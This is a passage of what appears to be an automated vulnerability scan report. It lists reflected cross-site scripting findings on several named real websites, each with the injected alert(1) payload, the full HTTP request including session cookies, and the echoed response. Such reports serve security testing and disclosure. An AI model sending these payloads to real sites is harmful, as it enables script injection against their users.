The value of the loid request parameter is copied into the HTML document as plain text between tags. The payload 99921<script>alert(1)</script>08f8719032 was submitted in the loid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /location.asp?loid=499921<script>alert(1)</script>08f8719032 HTTP/1.1
Host: www.morrisonmahoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSQCRSQQS=KJDHBHJAGEAKKPLCPGMMOFLP; visit=0;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 16 Apr 2011 14:36:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1526
Content-Type: text/html
Cache-control: private


<html>
<head>


<SCRIPT language="javascript">
function RI(images,iparams)
{
/* si: start index
** i: current index
** ei: end index
** cc: current count
*/
si = 0;
ci=0;
cc=0;

...[SNIP]...
<td>[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'location_id = 499921<script>alert(1)</script>08f8719032'.</td>
...[SNIP]...

4.160. http://www.morrisonmahoney.com/locations.asp [stid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.morrisonmahoney.com
Path:   /locations.asp

Issue detail

The value of the stid request parameter is copied into the HTML document as plain text between tags. The payload 5f04c<script>alert(1)</script>d8c433e5d2 was submitted in the stid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /locations.asp?stid=35f04c<script>alert(1)</script>d8c433e5d2 HTTP/1.1
Host: www.morrisonmahoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSQCRSQQS=KJDHBHJAGEAKKPLCPGMMOFLP; visit=0;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 16 Apr 2011 14:36:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1524
Content-Type: text/html
Cache-control: private


<html>
<head>


<SCRIPT language="javascript">
function RI(images,iparams)
{
/* si: start index
** i: current index
** ei: end index
** cc: current count
*/
si = 0;
ci=0;
cc=0;

...[SNIP]...
<td>[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'state_id=35f04c<script>alert(1)</script>d8c433e5d2'.</td>
...[SNIP]...

4.161. http://www.morrisonmahoney.com/newsrelease.asp [nrid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.morrisonmahoney.com
Path:   /newsrelease.asp

Issue detail

The value of the nrid request parameter is copied into the HTML document as plain text between tags. The payload ec521<script>alert(1)</script>6edfa1b3e51 was submitted in the nrid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsrelease.asp?nrid=534ec521<script>alert(1)</script>6edfa1b3e51 HTTP/1.1
Host: www.morrisonmahoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSQCRSQQS=KJDHBHJAGEAKKPLCPGMMOFLP; visit=0;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 16 Apr 2011 14:36:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1534
Content-Type: text/html
Cache-control: private


<html>
<head>


<SCRIPT language="javascript">
function RI(images,iparams)
{
/* si: start index
** i: current index
** ei: end index
** cc: current count
*/
si = 0;
ci=0;
cc=0;

...[SNIP]...
<td>[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'news_id = 534ec521<script>alert(1)</script>6edfa1b3e51'.</td>
...[SNIP]...

4.162. http://www.mylinkvault.com/link-page.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mylinkvault.com
Path:   /link-page.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fe9b"><script>alert(1)</script>0aa220655c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /link-page.php?1fe9b"><script>alert(1)</script>0aa220655c2=1 HTTP/1.1
Host: www.mylinkvault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en
Set-Cookie: PHPSESSID=vp85qklqj15vc4a1q0jtqd3le4; path=/; domain=.mylinkvault.com
Vary: Accept-Encoding
Content-Length: 4249
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE php PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<tit
...[SNIP]...
<input type="hidden" name="login_referer" value="/link-page.php?1fe9b"><script>alert(1)</script>0aa220655c2=1" />
...[SNIP]...

4.163. http://www.pandasecurity.com/activescan/requirements/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pandasecurity.com
Path:   /activescan/requirements/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0b93"><script>alert(1)</script>9f112544824 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /activescan/requirements/?error=chrome&track=1&Lang=en-US&IdPais=63&b0b93"><script>alert(1)</script>9f112544824=1 HTTP/1.1
Host: www.pandasecurity.com
Proxy-Connection: keep-alive
Referer: http://www.pandasecurity.com/activescan/index/?track=1&Lang=en-US&IdPais=63
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=en-US; AlteonP=3e4506e059006be3; ASP.NET_SessionId=nwhv35nnylyjcxamklrn3y55; Track=1; __utmz=216749847.1303044902.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=216749847.633268075.1303044902.1303044902.1303044902.1; __utmc=216749847; __utmb=216749847.2.10.1303044902

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Refresh: 28790
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sun, 17 Apr 2011 13:00:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 17 Apr 2011 13:00:18 GMT
Connection: close
Set-Cookie: Language=en-US; expires=Tue, 17-Apr-2012 13:00:01 GMT; path=/activescan
Content-Length: 21102


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
   <head>
       <link type="image/x-icon" href="/activescan/images/favicon.ico" rel="shortcut ico
...[SNIP]...
<a href="http://www.pandasecurity.com/activescan/requirements/?lang=de-DE&error=chrome&track=1&IdPais=63&b0b93"><script>alert(1)</script>9f112544824=1">
...[SNIP]...

4.164. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B0%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B0%5D request parameter is copied into the HTML document as plain text between tags. The payload 765fc<script>alert(1)</script>6ee45e5a499 was submitted in the FE%5Bfe_users%5D%5B0%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E765fc<script>alert(1)</script>6ee45e5a499&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:03 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27275

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
</script>765fc<script>alert(1)</script>6ee45e5a499');
   updateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users]
...[SNIP]...

4.165. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B0%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B0%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13d35\'%3balert(1)//8e6a0f23626 was submitted in the FE%5Bfe_users%5D%5B0%5D parameter. This input was echoed as 13d35\\';alert(1)//8e6a0f23626 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=13d35\'%3balert(1)//8e6a0f23626&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:20:47 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27209

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
il_html]','');
   updateForm('fe_users_form','FE[fe_users][tx_pdmylibrary_news_user]','');
   updateForm('fe_users_form','FE[fe_users][password_again]','3');
   updateForm('fe_users_form','FE[fe_users][0]','13d35\\';alert(1)//8e6a0f23626');
   updateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users]
...[SNIP]...

4.166. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B1%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B1%5D request parameter is copied into the HTML document as plain text between tags. The payload 79bfb<script>alert(1)</script>bbad2d37fb0 was submitted in the FE%5Bfe_users%5D%5B1%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=079bfb<script>alert(1)</script>bbad2d37fb0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:18 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
</script>');
   updateForm('fe_users_form','FE[fe_users][1]','079bfb<script>alert(1)</script>bbad2d37fb0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users]
...[SNIP]...

4.167. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B2%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B2%5D request parameter is copied into the HTML document as plain text between tags. The payload ae940<script>alert(1)</script>a026835ab0d was submitted in the FE%5Bfe_users%5D%5B2%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0ae940<script>alert(1)</script>a026835ab0d&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:31 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
</script>');
   updateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0ae940<script>alert(1)</script>a026835ab0d');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users][5]','0');
   updateForm('fe_users_form','FE[fe_users]
...[SNIP]...

4.168. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B3%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B3%5D request parameter is copied into the HTML document as plain text between tags. The payload c8d1b<script>alert(1)</script>d23dadbefc1 was submitted in the FE%5Bfe_users%5D%5B3%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0c8d1b<script>alert(1)</script>d23dadbefc1&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:41 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
</script>');
   updateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0c8d1b<script>alert(1)</script>d23dadbefc1');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users][5]','0');
   updateForm('fe_users_form','FE[fe_users][6]','0');
   /*]]>
...[SNIP]...

4.169. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B4%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B4%5D request parameter is copied into the application's response without HTML encoding: the payload e512f<script>alert(1)</script>d93c4114a89 was submitted in the FE%5Bfe_users%5D%5B4%5D parameter and was echoed unmodified. As the response excerpt below shows, the reflection point is the single-quoted string argument of an updateForm(...) call inside an inline script block, not plain text between tags; since the HTML parser ends a <script> element at the first </script> it sees regardless of JavaScript string syntax, an unencoded </script> in the echoed value terminates the script block and hands the remainder of the value to the HTML parser.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0e512f<script>alert(1)</script>d93c4114a89&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:58 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
